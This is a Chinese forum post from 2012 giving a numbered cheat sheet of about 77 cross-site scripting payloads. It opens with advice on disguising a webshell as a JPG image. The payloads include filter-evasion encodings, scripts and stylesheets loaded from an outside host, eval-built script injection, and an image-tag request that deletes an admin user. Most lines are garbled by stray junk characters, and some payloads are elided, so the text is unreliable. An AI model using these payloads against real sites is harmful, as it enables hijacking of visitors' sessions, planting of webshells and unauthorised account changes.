跨站图片shell
* w0 j7 T' I- K. O. l. O7 mXSS跨站代码 <script>alert("")</script>" a* p% `% i1 t0 N1 D7 ^
+ |' M6 l; O9 U- C' N# _
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
- X# E R) q( W& t- w( M1 u9 w' \8 a. r2 y
# z; j3 z3 J" A, S) M, k1 ]$ m/ c r8 |1 z$ ^1 D6 d/ c
1)普通的XSS JavaScript注入9 B% e0 m3 F ~9 \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% h, I9 J2 T# [* h) w: _- w
+ `7 Z; J6 d' m1 D; O& c(2)IMG标签XSS使用JavaScript命令' F/ R) U9 L# K6 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 D. {( J3 _" Q4 l0 b4 U
3 q/ @& a& r0 _% n/ M" U6 T
(3)IMG标签无分号无引号
: L# l4 M! W0 H* m- g<IMG SRC=javascript:alert(‘XSS’)>5 Z- ?; h. n- a( D
- P7 ~2 E6 g* ?$ Y' g(4)IMG标签大小写不敏感6 |9 T, Z7 s9 r1 k1 L& E
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* M z4 n# R/ v: G
. Y# d F4 ]& a; c4 I9 F(5)HTML编码(必须有分号)9 t; Z. z" s9 @1 v% `4 e8 W2 {
<IMG SRC=javascript:alert(“XSS”)>: E# G2 z8 A% f; I/ B1 w# F
/ ]! X! a& N6 K( B9 ~
(6)修正缺陷IMG标签5 _+ W0 a1 F3 N0 ]/ I$ w$ b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 z% b Q/ l- |3 _/ a) Z+ k4 r4 S
* {: Q X5 b3 _# O4 q& m
(7)formCharCode标签(计算器)
# y* a9 \* T7 N: h# q<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' O; ?, k- p `
, |( l1 m) G. o2 S- ?8 Y* ?(8)UTF-8的Unicode编码(计算器), {2 W/ Q: F; t' b* F, X+ Z
<IMG SRC=jav..省略..S')>* e4 O' v3 y9 d3 S1 Y$ x
& j5 i* o: D0 b0 ~. [ Z(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* W5 T" H( w& K
<IMG SRC=jav..省略..S')>0 Q6 @% s8 F: i, Z! v0 {% N: k' Y
1 }6 P5 E7 N9 g2 a1 Z# o- P(10)十六进制编码也是没有分号(计算器)
' x& ?" [9 J+ Z* _* w( ^<IMG SRC=java..省略..XSS')>3 x5 U; Q4 i# c/ ?- w
# g$ j" e$ L$ r' a: z; G(11)嵌入式标签,将Javascript分开' Q4 S: m: k& e) x
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 l, K7 T" w% K6 @ L: {
5 F: s* y" b1 c$ J& L(12)嵌入式编码标签,将Javascript分开0 | ]/ T. |5 ?- {
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 {8 z9 Y F# r- ~1 B% p
+ n3 U6 f" K- ^; R* y( H# t9 A(13)嵌入式换行符( f8 e! a; E+ A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( j# q6 Q, M3 B( o' K
. `2 E7 |- k& j2 i# [9 B+ Z2 w6 P(14)嵌入式回车
" V* _& o2 u5 p* R9 E0 U<IMG SRC=”jav ascript:alert(‘XSS’);”>; }' c. r1 |9 M
5 O: ?% m9 P, P(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! g& U0 E- f( b/ W( ?1 p<IMG SRC=”javascript:alert(‘XSS‘)”>
( Z% ?8 T; k- F7 T1 Z \ b0 w, ~* }& l" ?8 U& ?
(16)解决限制字符(要求同页面)
% ?0 `6 I4 s8 O% n% t1 R/ J<script>z=’document.’</script>% t' M+ M" U& g# d/ h
<script>z=z+’write(“‘</script>
2 o, L r8 ?' b; a+ C5 N<script>z=z+’<script’</script>$ \! v. g- a) `& [4 M* ~2 l
<script>z=z+’ src=ht’</script>
9 P3 M0 z% S1 H<script>z=z+’tp://ww’</script>
. Z2 B4 g; H* U: A6 r' f<script>z=z+’w.shell’</script>5 P Y+ ]; U: \4 W7 b: f; `
<script>z=z+’.net/1.’</script>
* g7 e# U% K. P& p" b<script>z=z+’js></sc’</script>+ Y8 r9 R: V# Z: W3 F& ]
<script>z=z+’ript>”)’</script>
7 t5 m: S9 {$ h5 e<script>eval_r(z)</script>" }# B! [' i' g& X4 P; j
7 f/ v0 e7 H# a A4 h(17)空字符
9 L- N/ }& k7 ^: O# k* r5 k3 Dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 m7 x/ h8 z7 e. c! c7 h. _4 x
" k( W5 n( l/ K! ]
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# r2 l _) b& N% m& K# [8 \
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; N$ u) T& K! ?7 O
# e0 Q! {5 P+ @2 w. g(19)Spaces和meta前的IMG标签4 B/ K- ?5 G$ w& ~
<IMG SRC=” javascript:alert(‘XSS’);”>
7 W" h/ m2 D8 s9 }) e. b; T1 d
(20)Non-alpha-non-digit XSS) {3 Q" K3 E; {
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" d6 r+ P' S6 Q; a8 X0 N/ K; c. L
) I" i7 i4 `6 E6 m0 H c3 P(21)Non-alpha-non-digit XSS to 2' ^0 s" ?& ?2 t0 y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- H i4 v- o' A2 Q
" f- C, [: C/ G( d(22)Non-alpha-non-digit XSS to 33 ?7 I' }( p- A# \% ]* q
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" c( E; ~) f$ E* y9 W; y0 c1 Z: E: {
3 H9 U: S1 T) [% C) a& n# k
(23)双开括号
% X0 P5 n4 L) i" x<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: n G! P- o: L" t
) O' F) d$ l5 g) N2 C& @(24)无结束脚本标记(仅火狐等浏览器)0 R4 x7 O( ~! [+ s+ }" `, Q. E+ W1 U
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- p$ A Y$ y$ W, B. b ], \/ J
5 w3 d8 X2 w. Q" _8 ?- ?. A5 W
(25)无结束脚本标记2* k! K+ b( q a7 n2 ]# Y+ f
<SCRIPT SRC=//3w.org/XSS/xss.js>! T" j- o0 s& g& N- {! } y
1 C3 F8 H; { o" }: [" E(26)半开的HTML/JavaScript XSS4 Y9 A8 w- ^% ?/ L) y" C5 l6 w" P
<IMG SRC=”javascript:alert(‘XSS’)”
) `9 Y7 n) v# S1 j2 Q1 l& I3 b( }- q
4 p& s" e. ]1 _+ ](27)双开角括号
9 }4 Z+ w% T9 W' Y2 F! I0 T; v<iframe src=http://3w.org/XSS.html <# }7 g4 i/ L+ E4 ^1 A
' e6 l3 ^( a$ `(28)无单引号 双引号 分号
* F; K: P. x1 M% w<SCRIPT>a=/XSS/
: I& \+ f- j8 m% v! h! b: malert(a.source)</SCRIPT>
1 R& I! \ w6 `7 [" I" s9 `6 h, ?4 b- h2 g9 _5 V! z# B: v
(29)换码过滤的JavaScript* `) A9 a9 q% N, Q4 |
\”;alert(‘XSS’);//
y9 e' r3 z6 v/ u( M4 E6 }4 r9 V* S9 j/ [/ g- _ \
(30)结束Title标签
" w8 c# o, _. A1 o9 N</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 W& t: x4 r# h5 p
4 y- L6 @# T! W1 m; l* a( }(31)Input Image5 z2 x- l4 i5 ]: R7 F
<INPUT SRC=”javascript:alert(‘XSS’);”>
3 a4 ]! p) ?/ n5 d+ e5 [! j" D( g$ i; t+ {4 b' X/ z
(32)BODY Image% x5 n( o( K5 ^! ^
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
: p1 j5 T$ h; J! N* N0 X+ c2 x: P x1 T- t( `8 V
(33)BODY标签: L2 ]' J: f' m. {, ]
<BODY(‘XSS’)>3 r3 E: i, D$ ?/ G2 z5 D
* K) L+ l6 ^% p' E3 C; I
(34)IMG Dynsrc3 \# g7 U' q" L! F) f( X8 i7 V
<IMG DYNSRC=”javascript:alert(‘XSS’)”>& i* ^/ s- v8 z8 I% h* g9 o
% [5 n) [; M, t4 O1 G(35)IMG Lowsrc+ U9 k9 h& n4 e! `9 H3 C
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
) J; I Q5 [& `0 Z' j! a
- r/ G6 m3 K9 v# T" {(36)BGSOUND
7 M" r% R' I) |" A3 y \! k<BGSOUND SRC=”javascript:alert(‘XSS’);”>) ^" s' U' h: ~6 e* m
* ?4 j: n; {+ t, d# n& U+ v(37)STYLE sheet- i; Y) G% ^! s
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% Z6 ?+ L0 S" h
/ Q! b+ Z; V; m$ d: Q; Z
(38)远程样式表9 S/ J) }4 z' T0 t+ k' R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 R4 s% D$ ^8 x, P# M
- ]9 F5 M" c( G H: l' ~/ m) O. V(39)List-style-image(列表式)
8 T, x$ Y5 J3 G& K<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ Z. k1 ^3 d' Y' p G; d& ?
9 U8 U$ K2 \: l* o6 ~
(40)IMG VBscript# j _- O( U6 e1 k5 W( S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ q% m+ F" l# |6 [. P5 D- L6 b
i) N, {# \ e(41)META链接url
' I/ s8 O9 t, D8 }$ e: Q# i+ J7 O5 _<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, ^0 P, ^8 ?+ A
' k6 c4 b$ |0 q5 Z- F& F
(42)Iframe
! V# F' h$ w; T& T5 S# J m3 }( ]<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( G. s. y6 p9 E$ o, K" K+ l0 b
(43)Frame
1 m9 w: G$ B+ L1 v1 [# D" ^* h<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>* K% f! |4 [( g. a
\! A% _8 }+ F ?
(44)Table1 N3 O3 K: W2 ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) i; C, d: n9 p
1 V4 v1 Y9 }6 m! p9 }$ V(45)TD9 j! n5 I4 D6 t5 n* K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 W/ u _6 u( \, l! e+ a4 [8 n$ t: I# C- t
(46)DIV background-image
+ o/ C0 r9 x$ L- n& V$ R<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) ]% n# s9 H: r6 S% k0 X: W
6 g) B. F/ U" s G5 V3 ?' ~(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ |0 K$ v$ J9 P/ R. L; i<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
: p% H- C" S6 T' Y; j& U- _7 ?& u4 |
(48)DIV expression
& ~) z; ? H( i8 j. [9 ^<DIV STYLE=”width: expression_r(alert(‘XSS’));”>% j w) E$ p# b5 Y' w
0 E4 C4 k, X2 W7 m! O(49)STYLE属性分拆表达; \! b ~ x6 Y3 n4 D
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 x1 o: t/ m. ]% O# ] T& A' B3 z
: _: {7 t) `0 q: D- A(50)匿名STYLE(组成:开角号和一个字母开头)
, ~4 e3 E. W' B# v c" U4 N' S<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, k- R6 L% X" g& k: }. A- h
7 O Z1 |5 o' \7 q* M+ H P(51)STYLE background-image
P7 a0 |5 ~, C( X, ?$ C {<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. g; h" X% M3 h3 l1 m: [+ r- B( `8 j) H! V7 t. F4 J$ f/ y
(52)IMG STYLE方式
" j9 }6 D- c+ p ^ ?exppression(alert(“XSS”))’>
# \3 y- _" m. `; m2 b
- S9 J% C+ R+ F9 B: M(53)STYLE background5 ` F( a" k5 ~0 P" g
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 ]1 {- t0 Q% Z J) a2 Q2 Q7 }" y3 z$ k
(54)BASE
: S% \$ v; n4 `; G+ Q2 q8 c# U. p" D<BASE HREF=”javascript:alert(‘XSS’);//”># [, y- W& b. }8 p6 g
' v3 B2 S& A H' T( S( O, W& Z, R
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 G0 y) t' h2 l; N( e5 }" m3 G
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, _( U; v7 l/ X) M
0 ^4 N7 K: H: T H/ J g7 H(56)在flash中使用ActionScrpt可以混进你XSS的代码6 `) f' {3 ?3 C1 e1 L# P" u1 V
a=”get”;
8 w& P5 N% s4 i$ Ab=”URL(\”";. H6 G9 T4 j+ }, k+ ~5 w% A
c=”javascript:”;
8 p7 w8 D/ J* |d=”alert(‘XSS’);\”)”;( _9 |9 V( n$ F3 x
eval_r(a+b+c+d);# H7 w/ r- G3 m
& E; b7 u! Z$ _+ s4 W(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; w- M6 t' X" ^3 u" I% |! }<HTML xmlns:xss>
' y v2 `4 N! {& p9 z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 m: ~# v2 v* Q" u6 S<xss:xss>XSS</xss:xss>5 I9 \( W' V0 u
</HTML> F6 N1 E0 ` d
4 ~: Q/ }( e- `" K0 X(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* R# |: H4 [! |* F8 a<SCRIPT SRC=””></SCRIPT>
- W( J% _2 Q" u+ D2 ~$ L
+ {3 N$ k+ H$ g(59)IMG嵌入式命令,可执行任意命令
5 s; w( c. D! U5 k$ @6 Z+ U. J; j<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ A+ j' F7 x9 q
: N; N6 j8 I" {(60)IMG嵌入式命令(a.jpg在同服务器)
# h4 K1 r1 U; {' I; `6 q& GRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 ~* O: c! Y6 C( @; f6 h9 E6 @# W8 ~
. m. t# z: h0 T+ g7 d! J& C: A) T(61)绕符号过滤
$ E0 Q, l* `7 x. n<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 I$ b) e; I( G
+ j6 ?( Y* k [(62)# ^9 R& Y7 o' G1 H9 R* D; X/ t
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 [! z% |3 K# F7 |' T
( N% y) o9 u5 D. p- V+ \2 B(63)
+ N# ?5 t% {, H9 u, g6 a<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ {! q* z. o9 M8 `3 g
, t- a. [' e: D* I(64)
3 h; I# k- C9 a" w2 t: L& k: r<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 W( g/ J+ Q9 Z3 U3 c! \) T; C
# B5 K' y* i" B q7 h6 w7 Z& Z) S(65)8 \; x& |' s. D2 `* P/ N
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
) A2 t$ G S( [$ `* k
7 d& ^9 e' ~1 h(66)& [$ [7 A; a: I3 |
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 p; A4 L. Z& g& v# S& E0 |
' t1 t- B7 G. y* V: d6 V! S8 Z(67)
2 t0 X8 C) O5 i<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
+ F ?. |# ^2 Q7 q; U: |' w, L* f, S: } |& R W
(68)URL绕行8 F q `! z, A' G: k
<A HREF=”http://127.0.0.1/”>XSS</A>
j7 F7 ]3 o" L v1 Q5 N9 [& T5 T$ {' Y0 t, P8 ]
(69)URL编码
, t" c; ^, D, g$ d" T- e<A HREF=”http://3w.org”>XSS</A>
1 Y! ^! s3 ~" M% [% t
( a7 T! g: D! A( s% T(70)IP十进制
% X: R0 q+ d: t( w* {2 W% R4 Q' d* l<A HREF=”http://3232235521″>XSS</A>
* I9 \; E Y& v: T7 y ]+ c3 N u: j6 y1 _" ^" H' j
(71)IP十六进制
6 g+ X1 }$ x) A9 S1 o% T& |<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ n# T. M; G6 D5 o
' d1 I+ U8 I' Z8 i& k$ u(72)IP八进制; m: @5 ?3 o; u# a7 ~
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ U" O* G6 m4 B+ G4 @0 n
, v1 W) t7 c" R" p: x' n0 j(73)混合编码5 G. ~8 P; R A& K+ |
<A HREF=”h' q2 i9 N3 m, W9 S( X7 H, F- e
tt p://6 6.000146.0×7.147/”">XSS</A>
/ ^2 T$ c2 V; I( |$ X, ?
. X8 o5 ^+ |# a(74)节省[http:]1 W% H" ?2 \# J3 x9 d
<A HREF=”//www.google.com/”>XSS</A>! ]1 F6 ~1 f) d2 \" `
3 t( k/ k7 H, p$ }(75)节省[www]
" {, c' f6 \9 k! r<A HREF=”http://google.com/”>XSS</A># K4 ?' V5 R3 B. Q G2 ?
4 _( ~& O, q2 t5 s! d
(76)绝对点绝对DNS
* w7 N( [* X1 V4 l. _- U) q1 m<A HREF=”http://www.google.com./”>XSS</A>9 }. P* _0 {- V) M6 B1 U2 G
( m. H; g- `- B3 n) Q! t5 f3 D5 X(77)javascript链接
0 ?) M& O4 X2 u8 d+ B) e1 h<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
: m0 z# x# A4 d3 I |
发表于 2012-9-13 17:04:56
收藏
支持
反对